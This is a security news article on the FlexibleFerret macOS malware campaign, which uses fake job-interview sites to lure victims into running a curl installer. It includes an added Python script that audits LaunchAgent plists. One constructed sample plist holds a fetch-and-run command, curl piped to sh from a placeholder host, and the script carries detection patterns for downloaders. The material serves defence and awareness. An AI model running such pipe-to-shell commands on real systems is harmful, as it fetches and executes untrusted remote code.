macOS Users Targeted by New FlexibleFerret Scam

macOS owners across the software-development and job-seeking community are being targeted by cunning social engineering attacks that deploy the malware known as FlexibleFerret. The operation behind these attacks—attributed to a North Korea–linked threat group behind the “Contagious Interview” campaign—relies on fake recruitment websites that persuade unsuspecting individuals to run malicious Terminal commands under the guise of bogus hiring assessments.

Security researchers from a major threat-intelligence team at Jamf have detailed how this campaign begins: potential victims are lured to sites presenting realistic job listings for roles such as “Blockchain Capital Operations Manager,” complete with interfaces for uploading video introductions and filling application forms. Once the candidate completes the simulated recruitment process, the site displays a prompt warning that camera or microphone access is blocked, urging the user to paste and execute a curl command in the macOS Terminal—a request framed as a requirement for the interview. That command then downloads a shell script and triggers the first stage of infection.

The loader script checks the system's hardware architecture and fetches a matching payload, after which it installs a LaunchAgent so that the malware persists across reboots. A decoy application—labeled MediaPatcher.app—is launched, presenting permission prompts styled like legitimate macOS system dialogs, followed by a Chrome-style login window designed to harvest the user’s credentials.
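The LaunchAgent persistence described above is something a defender can audit directly: per-user agents live in ~/Library/LaunchAgents as property lists, and an agent dropped by a one-line installer tends to run a shell wrapper, fetch code with curl at every login, or execute a binary from a temporary or user-writable path. The script below is an added example (not code from the article or from Jamf) that applies those generic heuristics to plist contents. The sample plists, the placeholder URL and the paths are constructed for illustration and are not indicators from the real campaign.

```python
"""Audit macOS LaunchAgent property lists for dropper-style persistence.

Added example, not code from the article or from Jamf. Heuristics, sample
plists, URL and paths are constructed for illustration only.
"""
import plistlib
import re
from dataclasses import dataclass, field

# Generic heuristics a defender would apply to ~/Library/LaunchAgents entries.
TEMP_OR_WRITABLE_PATH = re.compile(
    r"^(/tmp|/private/tmp|/var/tmp|/Users/Shared|/Users/[^/]+/Library/Caches)(/|$)"
)
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
SHELL_INTERPRETER = re.compile(r"^(/bin/|/usr/bin/)?(sh|bash|zsh)$")


@dataclass
class Finding:
    label: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def audit_launch_agent(plist_bytes: bytes) -> Finding:
    """Return a Finding listing why a LaunchAgent plist looks like dropper persistence."""
    data = plistlib.loads(plist_bytes)
    label = str(data.get("Label", "<no Label>"))
    finding = Finding(label)

    # launchd accepts either Program or ProgramArguments; normalise to one list.
    args = [str(a) for a in (data.get("ProgramArguments") or [])]
    if data.get("Program"):
        args.insert(0, str(data["Program"]))
    if not args:
        finding.reasons.append("no Program or ProgramArguments")
        return finding

    # Apple does not install its agents under a user's LaunchAgents folder,
    # so a com.apple.* label there is a common masquerading choice.
    if label.startswith("com.apple."):
        finding.reasons.append("label impersonates Apple namespace")

    # A shell interpreter with an inline command string hides what really runs.
    if SHELL_INTERPRETER.match(args[0]) and "-c" in args[1:]:
        finding.reasons.append("shell wrapper with inline command")

    # Fetching more code at every login matches the curl-based staging above.
    if any(DOWNLOADER.search(a) for a in args):
        finding.reasons.append("downloads code at launch")

    # Persistent binaries normally live under /Applications or /usr/local,
    # not in temp or cache directories that any user process can write to.
    if any(TEMP_OR_WRITABLE_PATH.match(a) for a in args):
        finding.reasons.append("runs from temporary or user-writable path")

    # Start at login plus restart-on-exit keeps a C2 connection up; alone it
    # is not proof, so it is only recorded alongside another signal.
    if data.get("RunAtLoad") and data.get("KeepAlive") and finding.reasons:
        finding.reasons.append("RunAtLoad + KeepAlive")
    return finding


def audit_many(plists: dict) -> list:
    """Audit a mapping of filename -> plist bytes; return only suspicious findings."""
    return [f for f in (audit_launch_agent(b) for b in plists.values()) if f.suspicious]


# Constructed sample plists (placeholders, not real indicators).
SAMPLES = {
    "com.example.sync.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.sync</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Example.app/Contents/MacOS/sync-helper</string>
    <string>--background</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
    "com.apple.mediahelper.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.mediahelper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>curl -fsSL http://placeholder.invalid/stage2 | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>""",
    "com.example.agent.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.agent</string>
  <key>Program</key><string>/Users/Shared/.cache/agent</string>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
}

if __name__ == "__main__":
    for f in audit_many(SAMPLES):
        print(f"{f.label}: {', '.join(f.reasons)}")
```

Against the constructed samples, the benign agent produces no reasons, the shell-wrapper agent is flagged on four counts, and the agent running from /Users/Shared is flagged on one. On a real system the same function can be fed the bytes of each file in ~/Library/LaunchAgents; the heuristics are deliberately generic, so hits should be treated as leads for triage rather than verdicts.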

Behind the scenes, a Go-based backdoor takes over. Once fully deployed, the malware establishes a connection to a hard-coded command-and-control server, enabling the attackers to collect system information, run arbitrary shell commands, upload or download files, steal browser profile data, and siphon off passwords and other sensitive credentials. Data exfiltration has been observed via legitimate-looking API endpoints such as Dropbox, with additional reconnaissance conducted through services that reveal public IP addresses.

This newer iteration of FlexibleFerret builds on earlier variants of the FERRET malware family, which security providers had already linked to the same campaign earlier in the year. While several older versions were blocked by updates to Apple’s XProtect system, the FlexibleFerret variant currently remains undetected by that defence tool—underscoring how threat actors continue to evolve their methods to defeat platform protections.

Analysts note that those behind the Contagious Interview operation are not relying on a single point of failure. Even when takedowns or blocking occur, they rapidly shift infrastructure, register new domains and roll out fresh recruitment lures. Their continued targeting of both individual developers and broader job-seeker pools suggests an operation that blends cyber espionage motives with potential financial gain.